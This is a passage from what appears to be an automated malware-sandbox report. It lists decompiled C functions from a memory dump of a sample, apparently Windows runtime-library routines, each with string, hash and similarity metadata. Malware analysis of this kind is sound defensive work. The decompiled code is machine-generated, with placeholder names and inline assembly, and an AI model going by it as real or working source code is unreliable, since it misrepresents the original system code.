                                        							_t64 = E016DE18B(_t109 + 4, _t97, 4, _t88, 0);
                                        							if(_t64 == 0x102) {
                                        								break;
                                        							}
                                        							_t93 =  *(_t109 + 4);
                                        							_v8 = _t93;
                                        							if((_t93 & 0x00000002) != 0) {
                                        								continue;
                                        							}
                                        							L15:
                                        							if(_t64 == 0x102) {
                                        								break;
                                        							}
                                        							_t89 = _v24;
                                        							if(_t64 < 0) {
                                        								L016FDF30(_t93, _t97, _t64);
                                        								_push(_t93);
                                        								_t98 = _t97 | 0xffffffff;
                                        								__eflags =  *0x1796901;
                                        								_push(_t109);
                                        								_v52 = _t98;
                                        								if( *0x1796901 != 0) {
                                        									_push(0);
                                        									_push(1);
                                        									_push(0);
                                        									_push(0x100003);
                                        									_push( &_v12);
                                        									_t72 = E016E9980();
                                        									__eflags = _t72;
                                        									if(_t72 < 0) {
                                        										_v12 = _t98 | 0xffffffff;
                                        									}
                                        								}
                                        								asm("lock cmpxchg [ecx], edx");
                                        								_t111 = 0;
                                        								__eflags = 0;
                                        								if(0 != 0) {
                                        									__eflags = _v12 - 0xffffffff;
                                        									if(_v12 != 0xffffffff) {
                                        										_push(_v12);
                                        										E016E95D0();
                                        									}
                                        								} else {
                                        									_t111 = _v12;
                                        								}
                                        								return _t111;
                                        							} else {
                                        								if(_t89 != 0) {
                                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                        									_t77 = E016C7D50();
                                        									__eflags = _t77;
                                        									if(_t77 == 0) {
                                        										_t64 = 0x7ffe0384;
                                        									} else {
                                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                        									}
                                        									__eflags =  *_t64;
                                        									if( *_t64 != 0) {
                                        										_t64 =  *[fs:0x30];
                                        										__eflags = _t64[0x240] & 0x00000004;
                                        										if((_t64[0x240] & 0x00000004) != 0) {
                                        											_t78 = E016C7D50();
                                        											__eflags = _t78;
                                        											if(_t78 == 0) {
                                        												_t64 = 0x7ffe0385;
                                        											} else {
                                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                        											}
                                        											__eflags =  *_t64 & 0x00000020;
                                        											if(( *_t64 & 0x00000020) != 0) {
                                        												_t64 = E01727016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                        											}
                                        										}
                                        									}
                                        								}
                                        								return _t64;
                                        							}
                                        						}
                                        						_t97 = _t88;
                                        						_t93 = _t109;
                                        						E0173FDDA(_t97, _v12);
                                        						_t105 =  *_t109;
                                        						_t67 = _v12 + 1;
                                        						_v12 = _t67;
                                        						__eflags = _t105 - 0xffffffff;
                                        						if(_t105 == 0xffffffff) {
                                        							_t106 = 0;
                                        							__eflags = 0;
                                        						} else {
                                        							_t106 =  *(_t105 + 0x14);
                                        						}
                                        						__eflags = _t67 - 2;
                                        						if(_t67 > 2) {
                                        							__eflags = _t109 - 0x1795350;
                                        							if(_t109 != 0x1795350) {
                                        								__eflags = _t106 - _v20;
                                        								if(__eflags == 0) {
                                        									_t93 = _t109;
                                        									E0173FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                        								}
                                        							}
                                        						}
                                        						_push("RTL: Re-Waiting\n");
                                        						_push(0);
                                        						_push(0x65);
                                        						_v20 = _t106;
                                        						E01735720();
                                        						_t104 = _v28;
                                        						_t116 = _t116 + 0xc;
                                        						continue;
                                        					}
                                        				}
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Re-Waiting
                                        • API String ID: 0-316354757
                                        • Opcode ID: 50b10c6bc971f454fb9b9a1b5c3fa065db302747bb59d30f4d2c9ed337d78bce
                                        • Instruction ID: 47684e84976653570ff9ae6808ee670316ac148cd8220d08e64c31b63cfcb341
                                        • Opcode Fuzzy Hash: 50b10c6bc971f454fb9b9a1b5c3fa065db302747bb59d30f4d2c9ed337d78bce
                                        • Instruction Fuzzy Hash: 8B611272A40645EBDB22DB6CCC94B7EBBA1FB44724F1402ADEA11973C2C7349D468B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E01770EA5(void* __ecx, void* __edx) {
                                        				signed int _v20;
                                        				char _v24;
                                        				intOrPtr _v28;
                                        				unsigned int _v32;
                                        				signed int _v36;
                                        				intOrPtr _v40;
                                        				char _v44;
                                        				intOrPtr _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t58;
                                        				unsigned int _t60;
                                        				intOrPtr _t62;
                                        				char* _t67;
                                        				char* _t69;
                                        				void* _t80;
                                        				void* _t83;
                                        				intOrPtr _t93;
                                        				intOrPtr _t115;
                                        				char _t117;
                                        				void* _t120;
                                        
                                        				_t83 = __edx;
                                        				_t117 = 0;
                                        				_t120 = __ecx;
                                        				_v44 = 0;
                                        				if(E0176FF69(__ecx,  &_v44,  &_v32) < 0) {
                                        					L24:
                                        					_t109 = _v44;
                                        					if(_v44 != 0) {
                                        						E01771074(_t83, _t120, _t109, _t117, _t117);
                                        					}
                                        					L26:
                                        					return _t117;
                                        				}
                                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                        				_t5 = _t83 + 1; // 0x1
                                        				_v36 = _t5 << 0xc;
                                        				_v40 = _t93;
                                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                        				asm("sbb ebx, ebx");
                                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                        				if(_t58 != 0) {
                                        					_push(0);
                                        					_push(0x14);
                                        					_push( &_v24);
                                        					_push(3);
                                        					_push(_t93);
                                        					_push(0xffffffff);
                                        					_t80 = E016E9730();
                                        					_t115 = _v64;
                                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                        						_push(_t93);
                                        						E0176A80D(_t115, 1, _v20, _t117);
                                        						_t83 = 4;
                                        					}
                                        				}
                                        				if(E0176A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                        					goto L24;
                                        				}
                                        				_t60 = _v32;
                                        				_t97 = (_t60 != 0x100000) + 1;
                                        				_t83 = (_v44 -  *0x1798b04 >> 0x14) + (_v44 -  *0x1798b04 >> 0x14);
                                        				_v28 = (_t60 != 0x100000) + 1;
                                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                        				_v40 = _t62;
                                        				if(_t83 >= _t62) {
                                        					L10:
                                        					asm("lock xadd [eax], ecx");
                                        					asm("lock xadd [eax], ecx");
                                        					if(E016C7D50() == 0) {
                                        						_t67 = 0x7ffe0380;
                                        					} else {
                                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        					}
                                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                        						E0176138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                        					}
                                        					if(E016C7D50() == 0) {
                                        						_t69 = 0x7ffe0388;
                                        					} else {
                                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        					}
                                        					if( *_t69 != 0) {
                                        						E0175FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                        					}
                                        					if(( *0x1798724 & 0x00000008) != 0) {
                                        						E017652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                        					}
                                        					_t117 = _v44;
                                        					goto L26;
                                        				}
                                        				while(E017715B5(0x1798ae4, _t83, _t97, _t97) >= 0) {
                                        					_t97 = _v28;
                                        					_t83 = _t83 + 2;
                                        					if(_t83 < _v40) {
                                        						continue;
                                        					}
                                        					goto L10;
                                        				}
                                        				goto L24;
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 545d17ec114acfb12ab103eba9a376aa92916cd3b442a0baa66212d41ea74a73
                                        • Instruction ID: 1b77b2c1cbeb3c57bc3dbf9a54a050b5b824807fd35e6ca21d69a60975b7b993
                                        • Opcode Fuzzy Hash: 545d17ec114acfb12ab103eba9a376aa92916cd3b442a0baa66212d41ea74a73
                                        • Instruction Fuzzy Hash: 79519C713043429FEB25DF28D884B2BFBE9EBC5714F04092CFA9697291D670E905CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E016DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				char* _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				char _v36;
                                        				char _v44;
                                        				char _v52;
                                        				intOrPtr _v56;
                                        				char _v60;
                                        				intOrPtr _v72;
                                        				void* _t51;
                                        				void* _t58;
                                        				signed short _t82;
                                        				short _t84;
                                        				signed int _t91;
                                        				signed int _t100;
                                        				signed short* _t103;
                                        				void* _t108;
                                        				intOrPtr* _t109;
                                        
                                        				_t103 = __ecx;
                                        				_t82 = __edx;
                                        				_t51 = E016C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                        				if(_t51 >= 0) {
                                        					_push(0x21);
                                        					_push(3);
                                        					_v56 =  *0x7ffe02dc;
                                        					_v20 =  &_v52;
                                        					_push( &_v44);
                                        					_v28 = 0x18;
                                        					_push( &_v28);
                                        					_push(0x100020);
                                        					_v24 = 0;
                                        					_push( &_v60);
                                        					_v16 = 0x40;
                                        					_v12 = 0;
                                        					_v8 = 0;
                                        					_t58 = E016E9830();
                                        					_t87 =  *[fs:0x30];
                                        					_t108 = _t58;
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                        					if(_t108 < 0) {
                                        						L11:
                                        						_t51 = _t108;
                                        					} else {
                                        						_push(4);
                                        						_push(8);
                                        						_push( &_v36);
                                        						_push( &_v44);
                                        						_push(_v60);
                                        						_t108 = E016E9990();
                                        						if(_t108 < 0) {
                                        							L10:
                                        							_push(_v60);
                                        							E016E95D0();
                                        							goto L11;
                                        						} else {
                                        							_t109 = L016C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                        							if(_t109 == 0) {
                                        								_t108 = 0xc0000017;
                                        								goto L10;
                                        							} else {
                                        								_t21 = _t109 + 0x18; // 0x18
                                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                        								 *_t109 = 1;
                                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                        								 *(_t109 + 0xe) = _t82;
                                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                        								E016EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                                        								_t91 =  *_t103 & 0x0000ffff;
                                        								_t100 = _t91 & 0xfffffffe;
                                        								_t84 = 0x5c;
                                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                        										_push(_v60);
                                        										E016E95D0();
                                        										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                        										_t51 = 0xc0000106;
                                        									} else {
                                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                        										goto L5;
                                        									}
                                        								} else {
                                        									L5:
                                        									 *_a4 = _t109;
                                        									_t51 = 0;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t51;
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction ID: 87883e133c5b97bb54c4a1d32614f9cb998b8a005811fa5ce0e74819060a0f5a
                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction Fuzzy Hash: 7B517C725057119FC320DF29C840A6BBBF9FF48B10F008A2DFA9687690E7B4E905CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E01723540(intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				char _v96;
                                        				char _v352;
                                        				char _v1072;
                                        				intOrPtr _v1140;
                                        				intOrPtr _v1148;
                                        				char _v1152;
                                        				char _v1156;
                                        				char _v1160;
                                        				char _v1164;
                                        				char _v1168;
                                        				char* _v1172;
                                        				short _v1174;
                                        				char _v1176;
                                        				char _v1180;
                                        				char _v1192;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				short _t41;
                                        				short _t42;
                                        				intOrPtr _t80;
                                        				intOrPtr _t81;
                                        				signed int _t82;
                                        				void* _t83;
                                        
                                        				_v12 =  *0x179d360 ^ _t82;
                                        				_t41 = 0x14;
                                        				_v1176 = _t41;
                                        				_t42 = 0x16;
                                        				_v1174 = _t42;
                                        				_v1164 = 0x100;
                                        				_v1172 = L"BinaryHash";
                                        				_t81 = E016E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                        				if(_t81 < 0) {
                                        					L11:
                                        					_t75 = _t81;
                                        					E01723706(0, _t81, _t79, _t80);
                                        					L12:
                                        					if(_a4 != 0xc000047f) {
                                        						E016EFA60( &_v1152, 0, 0x50);
                                        						_v1152 = 0x60c201e;
                                        						_v1148 = 1;
                                        						_v1140 = E01723540;
                                        						E016EFA60( &_v1072, 0, 0x2cc);
                                        						_push( &_v1072);
                                        						E016FDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                        						E01730C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                        						_push(_v1152);
                                        						_push(0xffffffff);
                                        						E016E97C0();
                                        					}
                                        					return E016EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                        				}
                                        				_t79 =  &_v352;
                                        				_t81 = E01723971(0, _a4,  &_v352,  &_v1156);
                                        				if(_t81 < 0) {
                                        					goto L11;
                                        				}
                                        				_t75 = _v1156;
                                        				_t79 =  &_v1160;
                                        				_t81 = E01723884(_v1156,  &_v1160,  &_v1168);
                                        				if(_t81 >= 0) {
                                        					_t80 = _v1160;
                                        					E016EFA60( &_v96, 0, 0x50);
                                        					_t83 = _t83 + 0xc;
                                        					_push( &_v1180);
                                        					_push(0x50);
                                        					_push( &_v96);
                                        					_push(2);
                                        					_push( &_v1176);
                                        					_push(_v1156);
                                        					_t81 = E016E9650();
                                        					if(_t81 >= 0) {
                                        						if(_v92 != 3 || _v88 == 0) {
                                        							_t81 = 0xc000090b;
                                        						}
                                        						if(_t81 >= 0) {
                                        							_t75 = _a4;
                                        							_t79 =  &_v352;
                                        							E01723787(_a4,  &_v352, _t80);
                                        						}
                                        					}
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                        				}
                                        				_push(_v1156);
                                        				E016E95D0();
                                        				if(_t81 >= 0) {
                                        					goto L12;
                                        				} else {
                                        					goto L11;
                                        				}
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        • Opcode ID: 29d9909412df74c6626518b9dff77f35d8268c87532c6493d906713540e0f979
                                        • Instruction ID: fb90456dc5dec4fcc4a249ee7cff1059a302eab58a8f59d37c48cf868dd53aa6
                                        • Opcode Fuzzy Hash: 29d9909412df74c6626518b9dff77f35d8268c87532c6493d906713540e0f979
                                        • Instruction Fuzzy Hash: 844133B1D0152D9BDF219A54CC84FEEB77DAB44714F0045A9EA09AB240DB349E898FA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E01723884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr* _v16;
                                        				char* _v20;
                                        				short _v22;
                                        				char _v24;
                                        				intOrPtr _t38;
                                        				short _t40;
                                        				short _t41;
                                        				void* _t44;
                                        				intOrPtr _t47;
                                        				void* _t48;
                                        
                                        				_v16 = __edx;
                                        				_t40 = 0x14;
                                        				_v24 = _t40;
                                        				_t41 = 0x16;
                                        				_v22 = _t41;
                                        				_t38 = 0;
                                        				_v12 = __ecx;
                                        				_push( &_v8);
                                        				_push(0);
                                        				_push(0);
                                        				_push(2);
                                        				_t43 =  &_v24;
                                        				_v20 = L"BinaryName";
                                        				_push( &_v24);
                                        				_push(__ecx);
                                        				_t47 = 0;
                                        				_t48 = E016E9650();
                                        				if(_t48 >= 0) {
                                        					_t48 = 0xc000090b;
                                        				}
                                        				if(_t48 != 0xc0000023) {
                                        					_t44 = 0;
                                        					L13:
                                        					if(_t48 < 0) {
                                        						L16:
                                        						if(_t47 != 0) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                        						}
                                        						L18:
                                        						return _t48;
                                        					}
                                        					 *_v16 = _t38;
                                        					 *_a4 = _t47;
                                        					goto L18;
                                        				}
                                        				_t47 = L016C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                        				if(_t47 != 0) {
                                        					_push( &_v8);
                                        					_push(_v8);
                                        					_push(_t47);
                                        					_push(2);
                                        					_push( &_v24);
                                        					_push(_v12);
                                        					_t48 = E016E9650();
                                        					if(_t48 < 0) {
                                        						_t44 = 0;
                                        						goto L16;
                                        					}
                                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                        						_t48 = 0xc000090b;
                                        					}
                                        					_t44 = 0;
                                        					if(_t48 < 0) {
                                        						goto L16;
                                        					} else {
                                        						_t17 = _t47 + 0xc; // 0xc
                                        						_t38 = _t17;
                                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                        							_t48 = 0xc000090b;
                                        						}
                                        						goto L13;
                                        					}
                                        				}
                                        				_t48 = _t48 + 0xfffffff4;
                                        				goto L18;
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        • Opcode ID: 9b3a4bf5a4c9494d2ece879f2234b4d02dd7476941e1bfc0aecd3c4079049744
                                        • Instruction ID: 4e17ad1ddb9476449af668c1a3b1954f7dfeb2794bbec839edab9bf78d149bc6
                                        • Opcode Fuzzy Hash: 9b3a4bf5a4c9494d2ece879f2234b4d02dd7476941e1bfc0aecd3c4079049744
                                        • Instruction Fuzzy Hash: 31313532A0052AAFEB15DA5CC845E7BFBB4FF49B24F01416DE984A7240D7349E01CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E016DD294(void* __ecx, char __edx, void* __eflags) {
                                        				signed int _v8;
                                        				char _v52;
                                        				signed int _v56;
                                        				signed int _v60;
                                        				intOrPtr _v64;
                                        				char* _v68;
                                        				intOrPtr _v72;
                                        				char _v76;
                                        				signed int _v84;
                                        				intOrPtr _v88;
                                        				char _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				char _v104;
                                        				char _v105;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				char _t38;
                                        				signed int _t40;
                                        				signed int _t44;
                                        				signed int _t52;
                                        				void* _t53;
                                        				void* _t55;
                                        				void* _t61;
                                        				intOrPtr _t62;
                                        				void* _t64;
                                        				signed int _t65;
                                        				signed int _t66;
                                        
                                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                        				_v8 =  *0x179d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                        				_v105 = __edx;
                                        				_push( &_v92);
                                        				_t52 = 0;
                                        				_push(0);
                                        				_push(0);
                                        				_push( &_v104);
                                        				_push(0);
                                        				_t59 = __ecx;
                                        				_t55 = 2;
                                        				if(E016C4120(_t55, __ecx) < 0) {
                                        					_t35 = 0;
                                        					L8:
                                        					_pop(_t61);
                                        					_pop(_t64);
                                        					_pop(_t53);
                                        					return E016EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                        				}
                                        				_v96 = _v100;
                                        				_t38 = _v92;
                                        				if(_t38 != 0) {
                                        					_v104 = _t38;
                                        					_v100 = _v88;
                                        					_t40 = _v84;
                                        				} else {
                                        					_t40 = 0;
                                        				}
                                        				_v72 = _t40;
                                        				_v68 =  &_v104;
                                        				_push( &_v52);
                                        				_v76 = 0x18;
                                        				_push( &_v76);
                                        				_v64 = 0x40;
                                        				_v60 = _t52;
                                        				_v56 = _t52;
                                        				_t44 = E016E98D0();
                                        				_t62 = _v88;
                                        				_t65 = _t44;
                                        				if(_t62 != 0) {
                                        					asm("lock xadd [edi], eax");
                                        					if((_t44 | 0xffffffff) != 0) {
                                        						goto L4;
                                        					}
                                        					_push( *((intOrPtr*)(_t62 + 4)));
                                        					E016E95D0();
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                        					goto L4;
                                        				} else {
                                        					L4:
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                        					if(_t65 >= 0) {
                                        						_t52 = 1;
                                        					} else {
                                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                        						}
                                        					}
                                        					_t35 = _t52;
                                        					goto L8;
                                        				}
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 097fbd879dbb52345520bbc33587ea5d4b6ed2e15942756a0ef02a882253e8fa
                                        • Instruction ID: 4d8b4b89eda5e1c561121a3586cb839f0078022ba01b3cb8e25cd07ef1a54d2f
                                        • Opcode Fuzzy Hash: 097fbd879dbb52345520bbc33587ea5d4b6ed2e15942756a0ef02a882253e8fa
                                        • Instruction Fuzzy Hash: D631A4B19093059FC321EF68CD8496BBBE8EB8A654F01092EF59483250DB35DD05CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E016B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				intOrPtr* _t26;
                                        				intOrPtr _t29;
                                        				void* _t30;
                                        				signed int _t31;
                                        
                                        				_t27 = __ecx;
                                        				_t29 = __edx;
                                        				_t31 = 0;
                                        				_v8 = __edx;
                                        				if(__edx == 0) {
                                        					L18:
                                        					_t30 = 0xc000000d;
                                        					goto L12;
                                        				} else {
                                        					_t26 = _a4;
                                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                        						goto L18;
                                        					} else {
                                        						E016EBB40(__ecx,  &_v16, __ecx);
                                        						_push(_t26);
                                        						_push(0);
                                        						_push(0);
                                        						_push(_t29);
                                        						_push( &_v16);
                                        						_t30 = E016EA9B0();
                                        						if(_t30 >= 0) {
                                        							_t19 =  *_t26;
                                        							if( *_t26 != 0) {
                                        								goto L7;
                                        							} else {
                                        								 *_a8 =  *_a8 & 0;
                                        							}
                                        						} else {
                                        							if(_t30 != 0xc0000023) {
                                        								L9:
                                        								_push(_t26);
                                        								_push( *_t26);
                                        								_push(_t31);
                                        								_push(_v8);
                                        								_push( &_v16);
                                        								_t30 = E016EA9B0();
                                        								if(_t30 < 0) {
                                        									L12:
                                        									if(_t31 != 0) {
                                        										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                        									}
                                        								} else {
                                        									 *_a8 = _t31;
                                        								}
                                        							} else {
                                        								_t19 =  *_t26;
                                        								if( *_t26 == 0) {
                                        									_t31 = 0;
                                        								} else {
                                        									L7:
                                        									_t31 = L016C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                        								}
                                        								if(_t31 == 0) {
                                        									_t30 = 0xc0000017;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t30;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: WindowsExcludedProcs
                                        • API String ID: 0-3583428290
                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction ID: 544679c5cd03ab7ccae74156efbfe9e3ed303d48464c5463df6461edc49c1021
                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction Fuzzy Hash: 3E21F87A501229FBDB32DA599C94FABBBADEF42A50F054525FA048B300D734DC4197E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                        				intOrPtr _t13;
                                        				intOrPtr _t14;
                                        				signed int _t16;
                                        				signed char _t17;
                                        				intOrPtr _t19;
                                        				intOrPtr _t21;
                                        				intOrPtr _t23;
                                        				intOrPtr* _t25;
                                        
                                        				_t25 = _a8;
                                        				_t17 = __ecx;
                                        				if(_t25 == 0) {
                                        					_t19 = 0xc00000f2;
                                        					L8:
                                        					return _t19;
                                        				}
                                        				if((__ecx & 0xfffffffe) != 0) {
                                        					_t19 = 0xc00000ef;
                                        					goto L8;
                                        				}
                                        				_t19 = 0;
                                        				 *_t25 = 0;
                                        				_t21 = 0;
                                        				_t23 = "Actx ";
                                        				if(__edx != 0) {
                                        					if(__edx == 0xfffffffc) {
                                        						L21:
                                        						_t21 = 0x200;
                                        						L5:
                                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                        						 *_t25 = _t13;
                                        						L6:
                                        						if(_t13 == 0) {
                                        							if((_t17 & 0x00000001) != 0) {
                                        								 *_t25 = _t23;
                                        							}
                                        						}
                                        						L7:
                                        						goto L8;
                                        					}
                                        					if(__edx == 0xfffffffd) {
                                        						 *_t25 = _t23;
                                        						_t13 = _t23;
                                        						goto L6;
                                        					}
                                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                        					 *_t25 = _t13;
                                        					L14:
                                        					if(_t21 == 0) {
                                        						goto L6;
                                        					}
                                        					goto L5;
                                        				}
                                        				_t14 = _a4;
                                        				if(_t14 != 0) {
                                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                        					if(_t16 <= 1) {
                                        						_t21 = 0x1f8;
                                        						_t13 = 0;
                                        						goto L14;
                                        					}
                                        					if(_t16 == 2) {
                                        						goto L21;
                                        					}
                                        					if(_t16 != 4) {
                                        						_t19 = 0xc00000f0;
                                        						goto L7;
                                        					}
                                        					_t13 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t21 = 0x1f8;
                                        					goto L5;
                                        				}
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Actx
                                        • API String ID: 0-89312691
